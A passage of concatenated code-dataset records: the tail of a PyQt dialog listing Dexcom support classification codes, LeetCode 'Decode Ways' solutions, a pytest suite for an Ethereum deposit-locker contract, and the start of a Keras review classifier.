Vibrating Continuously'] = 'Complaint'\n self.data['053 Screen Display Frozen'] = 'Complaint'\n self.data['056 Insufficient Training'] = 'Complaint'\n self.data['057 CFS Appears Randomly'] = 'Complaint'\n self.data['065 Err1 Cannot Restore \"Enter BG in 1 hour\" is Displayed'] = 'Complaint'\n self.data['066 Err0 Cannot Restore \"Enter BG in 15 min\" is Displayed '] = 'Complaint'\n self.data['067 Err1 at Cal \"Enter BG in 1 hour\" is displayed'] = 'Complaint'\n self.data['068 Err0 at Cal \"Enter BG in 15 minutes\" is displayed'] = 'Complaint'\n self.data['070 Hardware Error '] = 'Complaint'\n self.data['071 Failed Sensor (ESS) after calibration'] = 'Complaint'\n self.data['073 Foreign Object Debris Inside Receiver'] = 'Complaint'\n self.data['075 Bleeding'] = 'Complaint'\n self.data['076 Detached/Missing Sensor Wire'] = 'Complaint'\n self.data['077 Physical Damage - Sensor'] = 'Complaint'\n self.data['079 Receiver Button Flashing'] = 'Complaint'\n self.data['080 Intermittent Audio Output'] = 'Complaint'\n self.data['081 No Vibration'] = 'Complaint'\n self.data['082 Low Audio Output'] = 'Complaint'\n self.data['083 No Audio Output'] = 'Complaint'\n self.data['085 Intermittent Vibration'] = 'Complaint'\n self.data['088 Incorrect Battery Level Indicator'] = 'Complaint'\n self.data['089 Low Transmitter Battery'] = 'Complaint'\n self.data['090 Transmitter Failed error'] = 'Complaint'\n self.data['091 Micro USB door Malfunction'] = 'Complaint'\n self.data['092 Setup Wizard Inactive'] = 'Complaint'\n self.data['093 Manufacturing mode screen displayed'] = 'Complaint'\n self.data['094 Dexcom Website'] = 'Complaint'\n self.data['095 Potential non-reportable complaint'] = 'Complaint'\n self.data['096 Potential reportable event'] = 'Complaint'\n self.data['097 USB Port Dysfunction'] = 'Complaint'\n self.data['098 Choking'] = 'Complaint'\n self.data['099 Buttons Detached'] = 'Complaint'\n self.data['105 Abnormal Transmitter Behavior'] = 'Complaint'\n self.data['106 Overheating Receiver'] = 'Complaint'\n self.data['107 Overheating Accessory'] = 'Complaint'\n self.data['108 Packaging/Labeling'] = 'Complaint'\n self.data['109 Broken Needle/Cannula'] = 'Complaint'\n self.data['110 Detached Needle/Cannula'] = 'Complaint'\n self.data['111 Ceases to Function'] = 'Complaint'\n self.data['112 Calibration error'] = 'Complaint'\n self.data['113 Pairing Failed'] = 'Complaint'\n self.data['113 Pairing Failed'] = 'Complaint'\n self.data['114 Error icon displayed '] = 'Complaint'\n self.data['115 Loss of connection'] = 'Complaint'\n self.data['1502 Bruising'] = 'Complaint'\n self.data['200 Receiver Shield is Torn, Ripped, or Otherwise Damaged'] = 'Complaint'\n self.data['2000 Cradle Failure'] = 'Complaint'\n self.data['2001 Bluetooth Connection Problem '] = 'Complaint'\n self.data['2002 Cradle Blue Light Blinking After Pairing'] = 'Complaint'\n self.data['2004 Cradle Not Charging Receiver'] = 'Complaint'\n self.data['2005 Receiver Undocked From Cradle Due to Receiver Alert Vibration'] = 'Complaint'\n self.data['2006 Receiver USB Port/Door Damaged When Docking to Cradle'] = 'Complaint'\n self.data['2009 Receiver Indicates Bluetooth Pairing Unsuccessful'] = 'Complaint'\n self.data['201 Receiver Shield is Melted, Dissolved'] = 'Complaint'\n self.data['2010 Physical Damage -Transmitter'] = 'Complaint'\n self.data['2011 Physical Damage - Accessory'] = 'Complaint'\n self.data['2013 Transmitter Latch Issues'] = 'Complaint'\n self.data['2014 Transmitter Profile Issue'] = 'Complaint'\n self.data['2015 Buttons Hard to Press or Sticking'] = 'Complaint'\n self.data['202 Moisture Under the Receiver Shield'] = 'Complaint'\n self.data['203 Skin Reaction to Tape Adhesive'] = 'Complaint'\n self.data['204 Acoustic Spacer Moved, Detached '] = 'Complaint'\n self.data['205 Shield Pre-Cut Openings are Misaligned'] = 'Complaint'\n self.data['206 Difficulty Reading Receiver LCD Display Because of Shield Tape'] = 'Complaint'\n self.data['207 Receiver Does not Fit in Shield'] = 'Complaint'\n self.data['208 Discoloration of Receiver Shield'] = 'Complaint'\n self.data['209 Audio Alarms Sound Muffled'] = 'Complaint'\n self.data['210 Shield Tape 1 (Triangle Tape) Peeling'] = 'Complaint'\n self.data['211 Shield Tape 2 (Small Tape) Peeling'] = 'Complaint'\n self.data['3000 Blue Tooth Connection between Cradle and Share App'] = 'Complaint'\n self.data['3001 Internet Connection between Share App and Cloud'] = 'Complaint'\n self.data['3002 Share App Interruption Due to IOS Upgrade on Smart Device'] = 'Complaint'\n self.data['3003 Share App Screen Display Frozen'] = 'Complaint'\n self.data['3004 Receiver Icon No Data'] = 'Complaint'\n self.data['3005 Blue Tooth from Receiver issue'] = 'Complaint'\n self.data['3006 Blue Tooth Connection Between Receiver and Share App'] = 'Complaint'\n self.data['3007 Health Kit Feature Issue'] = 'Complaint'\n self.data['3008 Trend Graph Feature Issue'] = 'Complaint'\n self.data['3500 Share Cloud Service Unavailable'] = 'Complaint'\n self.data['4000 Follower App Interruption Due to IOS Upgrade on Smart Device'] = 'Complaint'\n self.data['4001 Follower App not Displaying Any Data (3 dashes)'] = 'Complaint'\n self.data['4002 Follower App not Receiving Notifications'] = 'Complaint'\n self.data['5000 Receiver Could not Communicate with Update Tool'] = 'Complaint'\n self.data['5001 Receiver Detached During Update'] = 'Complaint'\n self.data['5002 Connection Failed During an Update'] = 'Complaint'\n self.data['5003 Issues with Portrait Installation'] = 'Complaint'\n self.data['5004 Issues with Portrait Connectivity'] = 'Complaint'\n self.data['5005 Issues Uploading Receiver'] = 'Complaint'\n self.data['5006 Issues Downloading/Opening the Report'] = 'Complaint'\n self.data['5007 Issues Emailing the Report'] = 'Complaint'\n self.data['5008 Install Failure'] = 'Complaint'\n self.data['5009 Page Load Error'] = 'Complaint'\n self.data['5010 General Connectivity Issues'] = 'Complaint'\n self.data['5011 Clarity Uploader Issues'] = 'Complaint'\n self.data['5012 PATIENT PORTAL: Issues Viewing data report online'] = 'Complaint'\n self.data['5013 CLINIC PORTAL: Issues viewing data online'] = 'Complaint'\n self.data['5014 Issues printing the report'] = 'Complaint'\n self.data['5015 Issues with connectivity'] = 'Complaint'\n self.data['5016 Bluetooth connection between Transmitter and G5 Mobile App Issue'] = 'Complaint'\n self.data['5017 Internet connection between G5 Mobile App and the Cloud Issue'] = 'Complaint'\n self.data['5018 G5 Mobile App interruption due to iOS upgrade on smart device'] = 'Complaint'\n self.data['5019 Adjusting Clock message'] = 'Complaint'\n self.data['5020 Available storage on your Iphone is almost full notification'] = 'Complaint'\n self.data['5021 Available storage on your Iphone is full alert'] = 'Complaint'\n self.data['5022 A New version of Dexcom Update tool is available notification'] = 'Complaint'\n self.data['5023 \"Could not find a port for Dexcom receiver\" error message'] = 'Complaint'\n self.data['5024 Unexpected CGM App Shut-Off'] = 'Complaint'\n self.data['5100 Watch shows \"Check Follow App on Your iPhone\"'] = 'Complaint'\n self.data['5101 Watch shows \"Check Share2 App on Your iPhone\"'] = 'Complaint'\n self.data['5102 Watch shows \"---\" Instead of a Glucose Value'] = 'Complaint'\n self.data['5103 Watch is Showing a Red Crossed out iPhone Icon'] = 'Complaint'\n self.data['5104 Watch is not Showing Notifications'] = 'Complaint'\n self.data['5105 Watch is not Showing Notifications Every 5 Minutes'] = 'Complaint'\n self.data['400 Data Entry - Wrong Information Entered in Oracle Database'] = 'Inquiry'\n self.data['401 Billing Error - Patient Billed Incorrect Amount'] = 'Inquiry'\n self.data['402 Shipping Error- Incorrect Shipping Service Used'] = 'Inquiry'\n self.data['403 Fulfillment Error- Pulling/Packing error'] = 'Inquiry'\n self.data['404 Order Entry- Changed Order After Booking, Changes Did Not Take Affect'] = 'Inquiry'\n self.data['405 Lack of Follow Up- Customer expectation Was X, Deliverable Was Y'] = 'Inquiry'\n self.data['406 Distributor - Distributor Error'] = 'Inquiry'\n self.data['407 Phone - Phone system error'] = 'Inquiry'\n self.data['408 Clarity of Process- Proper Expectations Were Not Communicated to Customer'] = 'Inquiry'\n self.data['409 Quoting Error- Incorrect Out of Pocket Costs Provided'] = 'Inquiry'\n self.data['410 Insurance - Coverage Issue'] = 'Inquiry'\n self.data['411 Online Store Issue'] = 'Inquiry'\n self.data['500 Educate: Inserting a Sensor'] = 'Inquiry'\n self.data['501 Educate: Starting a Session'] = 'Inquiry'\n self.data['502 Educate: Stopping a Session'] = 'Inquiry'\n self.data['503 Educate: Setting Time/Date'] = 'Inquiry'\n self.data['504 Educate: Setting High/Low Alerts'] = 'Inquiry'\n self.data['505 Educate: Snoozing Feature'] = 'Inquiry'\n self.data['506 Educate: Setting Rise and Fall Rate Alerts'] = 'Inquiry'\n self.data['507 Educate: Setting Other Alerts'] = 'Inquiry'\n self.data['508 Educate: Setting Out of Range Alert'] = 'Inquiry'\n self.data['509 Educate: Entering TX ID Into Receiver'] = 'Inquiry'\n self.data['510 Educate: Entering a BG Value'] = 'Inquiry'\n self.data['512 Educate: Entering Events'] = 'Inquiry'\n self.data['513 Educate: Exporting Data From DM'] = 'Inquiry'\n self.data['514 Educate: Send Data to TS'] = 'Inquiry'\n self.data['515 Educate: Alert Clarification (Questions About How The Alerts Work)'] = 'Inquiry'\n self.data['516 Educate: When ERR1 is Displayed'] = 'Inquiry'\n self.data['517 Educate: When ERR0 is Displayed'] = 'Inquiry'\n self.data['518 Educate: When ??? Icon is Displayed in Status Box For Less Than 1 hour'] = 'Inquiry'\n self.data['519 Educate: With \"R2 Not Found\" Error in DM SW'] = 'Inquiry'\n self.data['520 Need Help Finding TX in Seven Plus Kit'] = 'Inquiry'\n self.data['521 Educate: Help With General Use of System'] = 'Inquiry'\n self.data['522 Educate: Receiver That Won\\'t Turn On'] = 'Inquiry'\n self.data['523 Need Help Installing DM Software'] = 'Inquiry'\n self.data['524 Need Help With General Use of DM Software'] = 'Inquiry'\n self.data['525 Need Help Printing DM Graphs'] = 'Inquiry'\n self.data['526 Educate: Setting Up Receiver For First Time'] = 'Inquiry'\n self.data['527 Educate: Antenna Icon is Displayed in Status Box For Less Than 15 Minutes'] = 'Inquiry'\n self.data['529 Educate: System Recovery Check'] = 'Inquiry'\n self.data['530 Request For Easier Insertion Process'] = 'Inquiry'\n self.data['600 Request to Merge Patient Data (R2 SNs) in DM SW'] = 'Inquiry'\n self.data['602 Request For MAC Compatibility'] = 'Inquiry'\n self.data['603 Request For USB/PC Charger For R2'] = 'Inquiry'\n self.data['604 Request For a Sensor Replacement Since PT Had a R2 Failure'] = 'Inquiry'\n self.data['605 Request For a Sensor Replacement Since PT Had a TX Failure'] = 'Inquiry'\n self.data['606 Request For Beep and Vibe Alert Feature'] = 'Inquiry'\n self.data['607 Request For Changes/Improvements on Sensor'] = 'Inquiry'\n self.data['608 Request For Changes/Improvements on Receiver'] = 'Inquiry'\n self.data['609 Request For Changes/Improvements on Transmitter'] = 'Inquiry'\n self.data['610 Request For Changes/Improvements on System'] = 'Inquiry'\n self.data['611 Request For Copy of IFU items'] = 'Inquiry'\n self.data['612 Request For Follow up Call if Lost Equipment is Found'] = 'Inquiry'\n self.data['613 Request For Changes/Improvement in Software'] = 'Inquiry'\n self.data['614 Request For Further Training/CES Contact Info'] = 'Inquiry'\n self.data['615 Request For Alarms to be Louder/Adjustable'] = 'Inquiry'\n self.data['616 Request For Event Details to Be Viewable on Receiver'] = 'Inquiry'\n self.data['617 Request For USB/Car Charger'] = 'Inquiry'\n self.data['618 Request For R2 to be Smaller'] = 'Inquiry'\n self.data['619 Request For Changes/Improvement on Cables'] = 'Inquiry'\n self.data['620 Request For Adhesive Recommendations'] = 'Inquiry'\n self.data['621 Request For a Sensor Replacement Since PT Had a Hardware Failure '] = 'Inquiry'\n self.data['622 Request to Support an Unapproved Product '] = 'Inquiry'\n self.data['707 Activate Clinical Features'] = 'Inquiry'\n self.data['708 Educate: Product Water Resistance'] = 'Inquiry'\n self.data['709 Educate: Calibration Requirements'] = 'Inquiry'\n self.data['710 Educate: Why The Arrow is Not Displayed'] = 'Inquiry'\n self.data['711 Educate: Charts in Software'] = 'Inquiry'\n self.data['712 Educate: Device Use During Medical Procedures'] = 'Inquiry'\n self.data['713 Educate: Device Use in Combination With Certain Medications'] = 'Inquiry'\n self.data['714 Educate: Inaccuracy When The Difference Between Sensor and BG Meter Readings is Less Than 20%'] = 'Inquiry'\n self.data['715 Educate: Sensor Location'] = 'Inquiry'\n self.data['716 Educate: Traveling With Dexcom System'] = 'Inquiry'\n self.data['717 Educate: Storage Conditions/Extreme Temperatures'] = 'Inquiry'\n self.data['718 Educate: Sensor Expiration Date'] = 'Inquiry'\n self.data['720 Educate: Materials Used in Production'] = 'Inquiry'\n self.data['721 Educate: Blinded Mode'] = 'Inquiry'\n self.data['777 Blatant Water/User Related Damage'] = 'Inquiry'\n self.data['800 Customer Felt Re-Order Rep Did Not Assist Them'] = 'Inquiry'\n self.data['801 Customer Felt Tech Support Rep Did Not Assist Them'] = 'Inquiry'\n self.data['802 Customer Felt Territory Sales Manager Did Not Assist Them'] = 'Inquiry'\n self.data['803 Customer Felt Clinical Education Specialist Did Not Assist Them'] = 'Inquiry'\n self.data['804 Customer Felt Sales Assistant Rep Did Not Assist Them'] = 'Inquiry'\n self.data['805 Field Rep Asked That Documentation Be Entered About PT'] = 'Inquiry'\n self.data['806 Field Rep Asked For Notes on This PT'] = 'Inquiry'\n self.data['807 PT Called With CS question. Transferred to CS.'] = 'Inquiry'\n self.data['809 Educate: Exporting Data From Patient Data Software'] = 'Inquiry'\n self.data['810 Educate: Enter BG in 15 Min. Alert'] = 'Inquiry'\n self.data['811 Educate: Enter BG in 1 Hr. Alert'] = 'Inquiry'\n self.data['812 Educate: Receiver Not Found Using Patient Data Software'] = 'Inquiry'\n self.data['813 Educate: Installing Patient Data Software'] = 'Inquiry'\n self.data['814 Educate: General Use - Patient Data Software'] = 'Inquiry'\n self.data['815 Educate: Printing Graphs, Charts, Information - Patient Data Software'] = 'Inquiry'\n self.data['816 Request for Patient data Software to be Mailed '] = 'Inquiry'\n self.data['817 Mobile App Feedback'] = 'Inquiry'\n self.data['818 Educate: Alert Profiles'] = 'Inquiry'\n self.data['819 Potential Inquiry; Attempted to Reach Customer at Request of VM, CS, Field - Unsure of Issue '] = 'Inquiry'\n self.data['820 Educate: No Antenna Icon For Start of Warm Up Period'] = 'Inquiry'\n self.data['850 Unable to Locate Invitation Email'] = 'Inquiry'\n self.data['851 Educate: Share System - Presale'] = 'Inquiry'\n self.data['852 Educate: Share Cloud'] = 'Inquiry'\n self.data['853 Educate: Share Glucomonster'] = 'Inquiry'\n self.data['854 Educate: Smart Device Airplane Mode/No Internet Connection'] = 'Inquiry'\n self.data['855 Educate: Smart Device Do Not Disturb Mode'] = 'Inquiry'\n self.data['856 Educate: Bluetooth Technology'] = 'Inquiry'\n self.data['857 Educate: Jailbroken Mobile Device'] = 'Inquiry'\n self.data['858 Educate: Mobile Data Connections'] = 'Inquiry'\n self.data['859 Educate: Pairing'] = 'Inquiry'\n self.data['860 Educate: Creating a Dexcom Share Account'] = 'Inquiry'\n self.data['861 Educate: Followers Settings on The Share App'] = 'Inquiry'\n self.data['862 Educate: Simultaneous Voice and Data From Mobile Carrier'] = 'Inquiry'\n self.data['863 Educate: Share Getting Started Process'] = 'Inquiry'\n self.data['864 Educate: Setting up Cradle'] = 'Inquiry'\n self.data['865 Educate: Inviting Follower(s) in Share App'] = 'Inquiry'\n self.data['866 Educate: Editing Follower(s) in Share App'] = 'Inquiry'\n self.data['867 Educate: Removing Follower(s) in Share App'] = 'Inquiry'\n self.data['868 Educate: Pairing New Smart Device'] = 'Inquiry'\n self.data['869 Educate: Replacing Cradle'] = 'Inquiry'\n self.data['870 Educate: Receiving Invitation Email'] = 'Inquiry'\n self.data['871 Educate: Follower Dashboard'] = 'Inquiry'\n self.data['872 Educate: Follower Trend Screen'] = 'Inquiry'\n self.data['873 Educate: Cradle And USB Maintenance'] = 'Inquiry'\n self.data['874 Educate: Forgot my Username/Password'] = 'Inquiry'\n self.data['875 Educate: Locked Out of my Account'] = 'Inquiry'\n self.data['876 Educate: Replacing my Smart Device'] = 'Inquiry'\n self.data['877 Educate: Replacing my Receiver'] = 'Inquiry'\n self.data['878 Educate: Installing Share App'] = 'Inquiry'\n self.data['879 Educate: Installing Follower App'] = 'Inquiry'\n self.data['880 Request For Other Mobile Device Compatibility'] = 'Inquiry'\n self.data['881 Request For Changes/Improvements to Share Hardware'] = 'Inquiry'\n self.data['882 Request For Changes/Improvements to Share App'] = 'Inquiry'\n self.data['883 Request For Changes/Improvements to Follower App'] = 'Inquiry'\n self.data['884 Educate: Time Delay Value'] = 'Inquiry'\n self.data['885 Educate: WIC (Window Imaging Component) Required For Installation Update Tool'] = 'Inquiry'\n self.data['886 Educate: No Available Updates For The Attached Receiver'] = 'Inquiry'\n self.data['887 Educate: Patient Inquiring How to Update Multiple Receivers'] = 'Inquiry'\n self.data['888 Educate: Patient Inquiring How to Stop an Update'] = 'Inquiry'\n self.data['889 Educate: Update Tool Saying \"Another Copy of This Application is Already Running.\"'] = 'Inquiry'\n self.data['890 Request For Changes/Improvements to Update Tool'] = 'Inquiry'\n self.data['891 Educate: Downloading/Installing Update Tool'] = 'Inquiry'\n self.data['892 Educate: Access Rights'] = 'Inquiry'\n self.data['893 Educate: System Requirements for Update Tool'] = 'Inquiry'\n self.data['894 Educate: Updating Receiver'] = 'Inquiry'\n self.data['895 Educate: Authorization Code'] = 'Inquiry'\n self.data['896 Educate: Options'] = 'Inquiry'\n self.data['897 Educate: Portrait Installation'] = 'Inquiry'\n self.data['898 Educate: Software Connectivity'] = 'Inquiry'\n self.data['899 Educate: Upload Receiver'] = 'Inquiry'\n self.data['900 Educate: Downloading/Saving Reports'] = 'Inquiry'\n self.data['901 Educate: Emailing Reports'] = 'Inquiry'\n self.data['902 Educate: Portrait Compatibility'] = 'Inquiry'\n self.data['903 Educate: CGM Readings Not Displaying During Vibe Insulin Delivery Suspension'] = 'Inquiry'\n self.data['904 Educate: Pairing Receiver to Share App'] = 'Inquiry'\n self.data['905 Educate: Health Kit Feature in Share App'] = 'Inquiry'\n self.data['906 Educate: Trend Graph Feature in Share App'] = 'Inquiry'\n self.data['907 Educate: Apple Watch System Requirements'] = 'Inquiry'\n self.data['908 Educate: Apple Watch Dashboard Screen Features'] = 'Inquiry'\n self.data['909 Educate: Apple Watch Trend Detail Screen Features'] = 'Inquiry'\n self.data['910 Educate: Apple Watch Glance Screen Features'] = 'Inquiry'\n self.data['911 Educate: Apple Watch Notification Features'] = 'Inquiry'\n self.data['912 Request For Changes/Improvements to 2ndary Display Item (Apple Watch)'] = 'Inquiry'\n self.data['913 Educate: Haptic'] = 'Inquiry'\n self.data['914 Educate: Smart Device Compatibility'] = 'Inquiry'\n self.data['915 Educate: Apple Watch Sleep Screen'] = 'Inquiry'\n self.data['916 Educate: Primary Display Between iPhone And Watch'] = 'Inquiry'\n self.data['917 Educate: Apple Watch Charging'] = 'Inquiry'\n self.data['918 Educate: Android Notification Features'] = 'Inquiry'\n self.data['919 Educate: Application setting vs. System settings'] = 'Inquiry'\n self.data['920 Educate: Sharing code'] = 'Inquiry'\n self.data['921 Educate: Discrepancy Between Displays'] = 'Inquiry'\n self.data['922 Educate: Adjusting Clock on Smart Device'] = 'Inquiry'\n self.data['923 Educate: Device storage requirements'] = 'Inquiry'\n self.data['924 Educate: message \"check G5 mobile app\" displayed on Apple Watch'] = 'Inquiry'\n self.data['925 Educate: Widget Usage'] = 'Inquiry'\n\n self.listWidget.addItems(self.data.keys())\n\n def on_lineEdit_textChange(self, text):\n def code():\n if text.trimmed() != '':\n matchingItems = self.listWidget.findItems(text, QtCore.Qt.MatchStartsWith)\n if len(matchingItems) > 0:\n self.listWidget.setCurrentItem(matchingItems[0])\n\n common.run_scary_code(self, code, show_wait_cursor = False)\n\n def on_listWidget_currentItemChange(self, item):\n def code():\n if self.data[str(item.text())] == 'Complaint':\n self.complaintRadioButton.setChecked(QtCore.Qt.Checked)\n else:\n self.inquiryRadioButton.setChecked(QtCore.Qt.Checked)\n\n common.run_scary_code(self, code, show_wait_cursor = False)\n\n def on_buttonBox_accept(self):\n super(SelectClassificationCodeDialog, self).accept()\n\n def on_buttonBox_reject(self):\n super(SelectClassificationCodeDialog, self).reject()\n","sub_path":"widget/dialogs/selectClassificationCode/cb/selectClassificationCodeDialog.py","file_name":"selectClassificationCodeDialog.py","file_ext":"py","file_size_in_byte":25911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"386389411","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n def createDPtable(s):\n table = [[False] * len(s) for _ in range(len(s))]\n\n for i in range(len(s)):\n if s[i] != '0':\n table[i][i] = True\n\n # length 2\n for i in range(len(s) - 1):\n substring = s[i:i + 2]\n if substring[0] != '0' and int(substring) >= 1 and int(substring) <= 26:\n table[i][i + 1] = True\n\n return table\n\n def backtrack(s, start, count):\n if start == len(s):\n count += 1\n return count\n\n for i in range(start, len(s)):\n if i - start <= 1 and dp[start][i]:\n count = backtrack(s, i + 1, count)\n return count\n\n if not s:\n return 0\n\n dp = createDPtable(s)\n count = backtrack(s, 0, 0)\n return count\n\nprint(Solution().numDecodings(\"2324\"))\n\n\nclass Solution2(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n def numDecodingsHelper(s, cache):\n\n if len(s) == 0:\n return 1\n\n if cache[len(s)]:\n return cache[len(s)]\n\n # not in cache, so calculate by summing the tails\n sum = 0\n\n for headsize in range(1, len(s) + 1):\n head = s[:headsize]\n tail = s[headsize:]\n\n if int(head) > 26 or head[0] == \"0\":\n break\n\n sum += numDecodingsHelper(tail, cache)\n\n cache[len(s)] = sum\n print(cache)\n return sum\n\n if not s:\n return 0\n return numDecodingsHelper(s, [0] * (len(s) + 1))\n\n\nprint(Solution2().numDecodings(\"23242221\"))\n\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n ways = [0] * (len(s) + 1)\n\n # base cases\n\n ways[-1] = 1\n ways[-2] = 1 if s[-1] != '0' else 0\n\n # Very similar to fibonacci\n\n for i in range(len(s) - 2, -1, -1):\n if s[i] == '0':\n continue\n if int(s[i:i + 2]) <= 26:\n ways[i] = ways[i + 1] + ways[i + 2]\n else:\n ways[i] = ways[i + 1]\n\n return ways[0]\n\n\n\n","sub_path":"91. Decode Ways.py","file_name":"91. Decode Ways.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159144096","text":"#! pytest\n\nimport pytest\nimport eth_tester.exceptions\n\n\n@pytest.fixture()\ndef deposit_contract_on_longer_chain(\n chain_cleanup, deposit_locker_contract_with_deposits, web3, chain\n):\n \"\"\"gives a chain long enough to be able to withdraw the deposit of the deposit contract\"\"\"\n contract = deposit_locker_contract_with_deposits\n\n block_to_reach = contract.functions.releaseBlockNumber().call()\n current_block = web3.eth.blockNumber\n to_mine = block_to_reach - current_block\n\n chain.mine_blocks(to_mine)\n\n return contract\n\n\ndef test_init_already_initialized(deposit_locker_contract, accounts):\n \"\"\"verifies that we cannot call the init function twice\"\"\"\n contract = deposit_locker_contract\n validator_contract_address = accounts[0]\n release_block_number = 100\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.init(\n release_block_number, validator_contract_address\n ).transact({\"from\": accounts[0]})\n\n\ndef test_init_not_owner(non_initialised_deposit_locker_contract_session, accounts):\n contract = non_initialised_deposit_locker_contract_session\n validator_contract_address = accounts[0]\n release_block_number = 100\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.init(\n release_block_number, validator_contract_address\n ).transact({\"from\": accounts[1]})\n\n\ndef test_init_passed_realease_block(\n non_initialised_deposit_locker_contract_session, accounts, web3\n):\n contract = non_initialised_deposit_locker_contract_session\n validator_contract_address = accounts[0]\n release_block = web3.eth.blockNumber - 1\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.init(release_block, validator_contract_address).transact(\n {\"from\": web3.eth.defaultAccount}\n )\n\n\ndef test_owner_after_init(deposit_locker_contract):\n contract = deposit_locker_contract\n\n assert (\n contract.functions.owner().call()\n == \"0x0000000000000000000000000000000000000000\"\n )\n\n\ndef test_deposit(deposit_locker_contract, accounts, web3):\n contract = deposit_locker_contract\n\n pre_balance = web3.eth.getBalance(accounts[2])\n assert contract.functions.deposits(accounts[2]).call() == 0\n\n deposit = 10000000\n tx = contract.functions.deposit(accounts[2]).transact(\n {\"from\": accounts[2], \"value\": deposit}\n )\n gas_used = web3.eth.getTransactionReceipt(tx).gasUsed\n\n assert contract.functions.deposits(accounts[2]).call() == deposit\n new_balance = web3.eth.getBalance(accounts[2])\n\n assert pre_balance - new_balance == deposit + gas_used\n\n\ndef test_withdraw(deposit_contract_on_longer_chain, accounts, web3, deposit_amount):\n \"\"\"test whether we can withdraw after block 10\"\"\"\n contract = deposit_contract_on_longer_chain\n\n pre_balance = web3.eth.getBalance(accounts[0])\n assert contract.functions.deposits(accounts[0]).call() == deposit_amount\n\n tx = contract.functions.withdraw().transact({\"from\": accounts[0]})\n gas_used = web3.eth.getTransactionReceipt(tx).gasUsed\n\n assert contract.functions.deposits(accounts[0]).call() == 0\n new_balance = web3.eth.getBalance(accounts[0])\n\n assert new_balance - pre_balance == deposit_amount - gas_used\n\n\ndef test_withdraw_too_soon(\n deposit_locker_contract_with_deposits, accounts, deposit_amount\n):\n \"\"\"test whether we can withdraw before releaseBlockNumber have been mined\"\"\"\n contract = deposit_locker_contract_with_deposits\n\n assert contract.functions.deposits(accounts[0]).call() == deposit_amount\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.withdraw().transact({\"from\": accounts[0]})\n\n\ndef test_deposit_not_initialised(\n non_initialised_deposit_locker_contract_session, accounts, deposit_amount\n):\n contract = non_initialised_deposit_locker_contract_session\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.deposit(accounts[0]).transact(\n {\"from\": accounts[0], \"value\": deposit_amount}\n )\n\n\ndef test_withdraw_not_initialised(\n non_initialised_deposit_locker_contract_session, accounts\n):\n contract = non_initialised_deposit_locker_contract_session\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.withdraw().transact({\"from\": accounts[0]})\n\n\ndef test_slash_not_initialised(\n non_initialised_deposit_locker_contract_session, accounts\n):\n contract = non_initialised_deposit_locker_contract_session\n\n with pytest.raises(eth_tester.exceptions.TransactionFailed):\n contract.functions.slash(accounts[0]).transact({\"from\": accounts[0]})\n\n\ndef test_event_deposit(deposit_locker_contract, accounts, web3):\n contract = deposit_locker_contract\n\n latest_block_number = web3.eth.blockNumber\n\n deposit = 10000000\n contract.functions.deposit(accounts[0]).transact(\n {\"from\": accounts[0], \"value\": deposit}\n )\n\n event = contract.events.Deposit.createFilter(\n fromBlock=latest_block_number\n ).get_all_entries()[0][\"args\"]\n\n assert event[\"depositOwner\"] == accounts[0]\n assert event[\"value\"] == deposit\n\n\ndef test_event_withdraw(\n deposit_contract_on_longer_chain, malicious_non_validator_address, web3\n):\n contract = deposit_contract_on_longer_chain\n\n # Use the malicious_non_validator_address, since he has not deposit already.\n\n latest_block_number = web3.eth.blockNumber\n\n deposit = 10000000\n contract.functions.deposit(malicious_non_validator_address).transact(\n {\"from\": malicious_non_validator_address, \"value\": deposit}\n )\n\n contract.functions.withdraw().transact({\"from\": malicious_non_validator_address})\n\n event = contract.events.Withdraw.createFilter(\n fromBlock=latest_block_number\n ).get_all_entries()[0][\"args\"]\n\n assert event[\"withdrawer\"] == malicious_non_validator_address\n assert event[\"value\"] == deposit\n\n\ndef test_event_slash(\n deposit_locker_contract_with_deposits,\n validator_slasher_contract,\n sign_two_equivocating_block_header,\n malicious_validator_address,\n malicious_validator_key,\n deposit_amount,\n web3,\n):\n\n latest_block_number = web3.eth.blockNumber\n\n two_signed_blocks_equivocated_by_malicious_validator = sign_two_equivocating_block_header(\n malicious_validator_key\n )\n\n validator_slasher_contract.functions.reportMaliciousValidator(\n two_signed_blocks_equivocated_by_malicious_validator[0].unsignedBlockHeader,\n two_signed_blocks_equivocated_by_malicious_validator[0].signature,\n two_signed_blocks_equivocated_by_malicious_validator[1].unsignedBlockHeader,\n two_signed_blocks_equivocated_by_malicious_validator[1].signature,\n ).transact()\n\n event = deposit_locker_contract_with_deposits.events.Slash.createFilter(\n fromBlock=latest_block_number\n ).get_all_entries()[0][\"args\"]\n\n assert event[\"validator\"] == malicious_validator_address\n assert event[\"slashedValue\"] == deposit_amount\n","sub_path":"contracts/tests/test_deposit_locker.py","file_name":"test_deposit_locker.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330277130","text":"\n# coding: utf-8\n\n# In[1]:\n\n__author__ = 'aqeel'\n'''Train and evaluate a simple MLP on the Souq.com Reviews newswire topic classification task.\nGPU run command:\n THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python examples/NNClassifiyReviews.py\nCPU run command:\n python examples/NNClassifiyReviews.py\n'''\nimport numpy as np\nfrom keras.models import Sequential, load_model,Model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.utils import np_utils\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\nfrom keras.layers.recurrent import LSTM\nimport random\nimport math\nimport pandas as pd\nimport re\n\n#For the baseline\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom 